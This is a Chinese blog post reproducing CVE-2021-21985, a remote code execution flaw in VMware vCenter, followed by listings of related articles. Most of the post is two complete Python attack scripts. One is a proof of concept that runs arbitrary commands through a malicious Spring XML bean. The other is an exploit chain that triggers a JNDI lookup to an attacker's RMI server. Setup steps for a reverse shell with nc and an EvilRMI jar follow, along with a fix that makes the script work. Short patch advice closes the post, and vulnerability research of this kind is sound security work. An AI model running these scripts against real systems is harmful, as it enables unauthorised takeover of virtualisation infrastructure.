(复现)CVE-2021-21985 Vmware vcenter远程代码执行RCE

最新推荐文章于 2025-03-27 00:10:13 发布
最新推荐文章于 2025-03-27 00:10:13 发布
阅读量5.3k 收藏 7
点赞数 3
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40989258/article/details/118354411
版权

0x00 简介

        vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。        

0x01 漏洞概述

        该漏洞由于vCenter Server默认启用的插件Virtual SAN Health Check缺少输入验证导致的。能通过443端口访问到vSphere Client(HTML5)的攻击者,可以构造特殊的请求包在目标机器上执行任意代码。

0x02 影响版本

VMware:vCenter Server:

  • 非7.0 U2b版本的7.0版本
  • 非6.7 U3n版本的6.7版本
  • 非6.5 U3p版本的6.5版

VMware:Cloud Foundation:

  • 低于4.2.1版本的4.x版本
  • 低于3.10.2.1版本的3.x版本

0x03 漏洞利用

环境搭建可参考https://blog.csdn.net/z136370204/article/details/111719373,此文不表。

1、首先使用POC执行whoami来测试是否存在该漏洞。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: r0cky
@Time: 2021/6/3-16:57
"""
import base64
import sys
import zipfile
from urllib.parse import urlparse

import zlib
import json
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies={'https':'http://127.0.0.1:8080'}

def banner():
    print("""
==============================================================
         _____           _              _____   _____ ______ 
        / ____|         | |            |  __ \ / ____|  ____|
 __   _| |     ___ _ __ | |_ ___ _ __  | |__) | |    | |__   
 \ \ / / |    / _ \ '_ \| __/ _ \ '__| |  _  /| |    |  __|  
  \ V /| |___|  __/ | | | ||  __/ |    | | \ \| |____| |____ 
   \_/  \_____\___|_| |_|\__\___|_|    |_|  \_\\_____|______|
                                                             
                              Powered by r0cky Team ZionLab
==============================================================
    """)



def create_xml():

    print("[*] Create Xml to offline_bundle.xml ...")
    context = """<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg>
          <list>
            <value>/bin/bash</value>
            <value>-c</value>
            <value><![CDATA[ {cmd} 2>&1 ]]></value>
          </list>
        </constructor-arg>
    </bean>
    <bean id="is" class="java.io.InputStreamReader">
        <constructor-arg>
            <value>#{pb.start().getInputStream()}</value>
        </constructor-arg>
    </bean>
    <bean id="br" class="java.io.BufferedReader">
        <constructor-arg>
            <value>#{is}</value>
        </constructor-arg>
    </bean>
    <bean id="collectors" class="java.util.stream.Collectors"></bean>
    <bean id="system" class="java.lang.System">
        <property name="whatever" value="#{ system.setProperty(&quot;output&quot;, br.lines().collect(collectors.joining(&quot;\n&quot;))) }"/>
    </bean>
</beans>
""".replace("{cmd}", cmd)
    with open('offline_bundle.xml', 'w') as wf:
        wf.write(context)
        wf.flush()

def create_zip():
    print("[*] Create Zip to offline_bundle.zip ...")
    with zipfile.ZipFile('offline_bundle.zip', 'w', zipfile.ZIP_DEFLATED) as zp:
        zp.write('offline_bundle.xml')

def toBase64():
    with open('offline_bundle.zip', 'rb') as rf:
        return base64.b64encode(rf.read())

def poc1(url):
    ssrf_str = "https://localhost:443/vsanHealth/vum/driverOfflineBundle/data:text/html%3Bbase64,{}%23"
    ssrf = ssrf_str.format(bytes.decode(toBase64()))

    print ("[*] Get XML to SystemProperties  ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages"

    data = {"methodInput":[[ssrf]]}

    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)


def poc2(url):

    print("[*] getProperty   ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty"

    data = {"methodInput": ["output", None]}

    r = requests.post(target, data=json.dumps(data), headers=headers,
                      verify=False, proxies=proxies)
    if "result" in r.json():
        print("[+] Command:", cmd)
        print(r.json()['result'])
    else:
        print ("[-] send payload failed.")

headers = {"Content-Type": "application/json"}

def main(url):
    try:
        create_xml()
        create_zip()
        poc1(url)
        poc2(url)
    except:
        print("[-] send payload failed.")

if __name__ == '__main__':
    banner()
    try:
        target = sys.argv[1]
        cmd = sys.argv[2]
        up = urlparse(target)
        target = up.scheme + "://" + up.netloc
        main(target)
    except:
        print("Example: \n\tpython3 " + sys.argv[0] + " <target> <cmd>\n")

该POC创建了一个恶意xml文件,打包成zip,并base64后通过特定格式发送,返回包含result字段,及证明存在该漏洞。

2、使用EXP反弹Shell

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: r0cky
@Time: 2021/6/3-16:57
"""

import sys
from urllib.parse import urlparse

import json
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies={'https':'http://127.0.0.1:8080'}


def banner():
    print("""
==============================================================
         _____           _              _____   _____ ______ 
        / ____|         | |            |  __ \ / ____|  ____|
 __   _| |     ___ _ __ | |_ ___ _ __  | |__) | |    | |__   
 \ \ / / |    / _ \ '_ \| __/ _ \ '__| |  _  /| |    |  __|  
  \ V /| |___|  __/ | | | ||  __/ |    | | \ \| |____| |____ 
   \_/  \_____\___|_| |_|\__\___|_|    |_|  \_\\_____|______|
                                                             
                              Powered by r0cky Team ZionLab
==============================================================
    """)


def payload1(url):
    print ("[*] Step 1 setTargetObject to null ...")

    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetObject"

    data = {"methodInput":[None]}

    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)

    if "result" in r.json():
        payload2(url)
    else:
        print ("[-] send payload failed1.")


def payload2(url):
    print("[*] Step 2 setStaticMethod to payload ...")

    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setStaticMethod"

    data = {"methodInput": ["javax.naming.InitialContext.doLookup"]}

    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)

    if "result" in r.json():
        payload3(url)
    else:
        print ("[-] send payload failed2.")

def payload3(url):
    print("[*] Step 3 setTargetMethod to doLookup ...")

    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetMethod"

    data = {"methodInput": ["doLookup"]}

    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)

    if "result" in r.json():
        payload4(url)
    else:
        print ("[-] send payload failed3.")

def payload4(url):
    print("[*] Step 4 setArguments with payload args ...")

    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setArguments"

    data = {"methodInput": [[rmi_class]]}

    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)

    if "result" in r.json():
        payload5(url)
    else:
        print ("[-] send payload failed4.")

def payload5(url):
    print("[*] Step 5 initial payload class and methods ...")

    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/prepare"

    data = {"methodInput": []}

    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)

    if "result" in r.json():
        payload6(url)
    else:
        print ("[-] send payload failed5.")

def payload6(url):
    print("[*] Step 6 trigger method invoke ...")

    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/invoke"

    data = {"methodInput": []}

    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)

    print("[+] send payload success.")
    print()
    print("[END] VMWare vCenter RCE Done.")

headers = {"Content-Type": "application/json"}

if __name__ == '__main__':
    banner()
    try:
        target = sys.argv[1]
        rmi_class = sys.argv[2]
        up = urlparse(target)
        target = up.scheme + "://" + up.netloc
        payload1(target)
    except:
        print("Example: \n\tpython3 " + sys.argv[
            0] + " <target> <rmi://ip/class>\n")

首先需要启动RMI,

java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMI x.x.x.x

然后开启reverse shell监听

nc -lvnp 5555

 最后执行EXP

python3 CVE-2021-21985_exp.py https://vulip:port rmi://attip:1097/ExecByEL

复现中发现该EXP的payload5和payload6函数中的None要删掉,不然会失败。

0x04 修复方式

VMware:vCenter Server:

  • 7.0版本升级到7.0 U2b
  • 6.7版本升级到6.7 U3n
  • 6.5版本升级到6.5 U3p

VMware:Cloud Foundation:

  • 4.x版本升级到4.2.1
  • 3.x版本升级到3.10.2.1

官方公告:

https://www.vmware.com/security/advisories/VMSA-2021-0010.html

Referer:

1、https://github.com/r0ckysec/CVE-2021-21985

2、https://github.com/xnianq/cve-2021-21985_exp

复现CVE-2021-2109 (Weblogic Server远程代码执行漏洞)
记录并分享学习安全的知识点..
01-19 4223
一、漏洞介绍 2021年1月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。 二、影响版本 WebLogic 3.6.0.0 WebLogic 1.3.0.0 WebLogic 2.1.3.0 WebLogic 2.1.4.0 漏洞判别方式:http://x.x.x.x:7001/conso
CVE-2021-21985 vCenter复现RCE
tesla889的博客
01-10 1033
VMware在5月25日发布了CVE-2021-21985vCenter远程代码执行漏洞通告及修复版本,该漏洞允许未经身份认证的用户调用任意Bean里的任意方法,当调用一个恶意方法时会导致任意代码执行
cve-2021-21985漏洞复现
whojoe的博客
06-09 6754
cve-2021-21985漏洞复现受影响的版本:漏洞复现后续利用参考文章 受影响的版本: VMware vCenter Server 7.0系列 < 7.0.U2b VMware vCenter Server 6.7系列 < 6.7.U3n VMware vCenter Server 6.5系列 < 6.5 U3p VMware Cloud Foundation 4.x 系列 < 4.2.1 VMware Cloud Foundation 4.x 系列 < 3.10.2.1
CyberStrikeLab靶场-CVE-2021-41277-Metabase文件读取漏洞的利用
最新发布
jemus17的博客
03-27 317
Metabase是美国Metabase公司的一个开源数据分析平台。Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。CNNVD编号:CNNVD-202111-1565危害等级: 超危CVE编号: CVE-2021-41277创建靶机后连接,输入第一步信息后第二步直接跳过来到这个页面,这个漏洞是一个非常简单的级别。
CVE-2021-21985 漏洞复现
HEAVEN569的博客
08-12 3852
CVE-2021-21985 漏洞复现 1.漏洞简介 该漏洞存在于vSphere Client(HTML5)中,由于vCenter Server中默认启用的Virtual SAN Health Check插件缺乏输入验证,拥有443端口网络访问权限的攻击者可以利用此漏洞在承载vCenter Server的操作系统上远程执行任意命令。 需要注意的是,Virtual SAN Health Check插件在所有vCenter Server中都默认启用,任何能够通过网络访问vCenter Server的未经身份验证
漏洞情报 | VMware vCenter Server 远程代码执行漏洞(CVE-2021-21985)
爱国小白帽
05-28 5309
点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 VMware vCenter Server是VMware虚拟化管理平台,广泛的应用于企业私有云内网中。通过使用vCenter,管理员可以轻松的管理上百台虚拟化环境 。 2021年5月26日,360漏洞云监测到VMware官网发布安全公告。攻击者使用漏洞(CVE-2021-21985)可构造恶意请求,通过vCenter中默认开启的Virtual SAN Health Check插件造成远程代码执行漏洞。360漏洞云已经成功复现该漏洞。 0x02
CVE-2021-21985VMCenterSe远程代码执行
爱国小白帽
05-26 1102
报告编号:B6-2021-052602 报告来源:360CERT 报告作者:360CERT 更新日期:2021-05-26 1 漏洞简述 2021年05月26日,360CERT监测发现VMware官方发布了VMware vCenter Server远程代码执行漏洞的风险通告,该漏洞是由360 Noah Lab的安全研究员Ricter Z发现的。漏洞编号为CVE-2021-21985,漏洞等级:严重,漏洞评分:9.8。 VMware vCenter Server是VMware虚拟化管理平台,广泛的应用于企业私
CVE-2021-21985 VMware vCenter Server 远程代码执行
寒星的博客
06-08 1289
漏洞简介 Vmware vSphere Client是美国威睿(Vmware)公司的一个应用软件。 vSphere Client存在安全漏洞,该漏洞由于vCenter Server默认启用的虚拟SAN健康检查插件缺乏输入验证导致底层操作系统上以不受限制的权限执行命令。 影响版本 VMware vCenter Server 7.0系列 < 7.0.U2b VMware vCenter Server 6.7系列 < 6.7.U3n VMware vCenter Server 6.5系列 < .
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter未授权RCECVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
VMware vCenter Server远程代码执行漏洞复现 CVE-2021-21972
热门推荐
Ms08067安全实验室
08-18 1万+
文章来源|MS08067安全实验室本文作者:Taoing(WEB高级攻防班讲师)0x00 漏洞描述CVE-2021-21972 vmware vcenter的一个未任意位置,然后执行web...
VMware vCenter Server任意文件上传漏洞(CVE-2021-22005)复现
qq_42036164的博客
04-03 1158
其中,最为严重的漏洞为vCenter Server 中的任意文件上传漏洞(CVE-2021-22005),该漏洞存在于vCenter Server的分析服务中,其CVSSv3评分为 9.8。注:CVE-2021-22005会影响所有默认配置的 vCenter Server 6.7 和 7.0 部署,不会影响 vCenter Server 6.5。2021年9月21日,VMware发布安全公告,公开披露了vCenter Server中的19个安全漏洞,这些漏洞的CVSSv3评分范围为4.3-9.8。
【技术分享】vCenter Server CVE-2021-21985 RCE分析 .pdf
09-05
【技术分享】vCenter Server CVE-2021-21985 RCE分析 业务安全 安全研究 网络安全 威胁情报 安全实践
vCenter 6.5-7.0 RCE 漏洞复现(CVE-2021-21972)附POC
总有人间一两风,填我十万八千梦
03-11 1万+
一. 漏洞介绍 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机。 2021年02月24日,某些平台监测到 Vmware官方发布了vCenter Server安全更新,修复了vSphereClient (HTML5)vCenter Server插件vRealizeOperatio...
为您的安全保驾护航:CVE-2021-21985 漏洞检测与防护工具
gitblog_00029的博客
05-31 467
为您的安全保驾护航:CVE-2021-21985 漏洞检测与防护工具 项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2021-21985_PoC 1、项目介绍 该项目是针对CVE-2021-21985的漏洞检测和防护工具。这是一个影响VMware vCenter Server的安全问题,由于Virtual SAN Health Check插件的输入验证不足,...
推荐使用CVE-2021-21985漏洞检测与利用工具
gitblog_00250的博客
08-28 486
推荐使用CVE-2021-21985漏洞检测与利用工具 CVE-2021-21985_PoC项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2021-21985_PoC 项目介绍 CVE-2021-21985是一个针对VMware vSphere Client(HTML5)的远程代码执行漏洞。该漏洞源于Virtual SAN Health Check插件中缺...
Vmware vcenter未授权任意文件/RCE漏洞的复现与分析
weixin_46236101的博客
02-28 4664
0x01 背景 vSphere是VMware推出的虚拟化平台套件,包含ESXi、vCenter Server等一系列的软件。其中vCenter Server为 ESXi的控制中心,可从单一控制点统一管理数据中心的所有vSphere主机和虚拟机,使得IT管理员能够提高控制能力,简化入场任务,并降低IT环境的管理复杂性与成本。 vSphere Client(HTML5)在vCenter Server插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放443端口的服务器向vCenter Server发送
速修复!VMware vCenter Server 所有版本受严重的 RCE 漏洞影响
smellycat000的专栏
05-26 710
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士VMware 修复了位于 vCenter Server 中的一个严重漏洞。攻击者可利用该漏洞在服务器上执行任意代码。该漏洞的编号是...
VMware 修复 vCenter 服务器中的严重 RCE 漏洞
smellycat000的专栏
02-24 891
聚焦源代码安全,网罗国内外最新资讯!作者:Pierluigi Paganini编译:奇安信代码卫士团队VMware 修复 vCenter Server 虚拟基础设施管理平台中的一个严重远...
VM View Planner RCE 漏洞(CVE-2021-21978)复现
玄道的网安博客
03-28 510
简介 View Planner是VMware官方推出的一款针对view桌面的测试工具,通过这个测试工具可以估算出在指定的应用环境下可以发布多少个view桌面。 影响版本 VMware View Planner <= 4.6.0 环境搭建 https://my.vmware.com/en/group/vmware/downloads/details?downloadGroup=VIEW-PLAN-460&productId=1067&rPId=...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值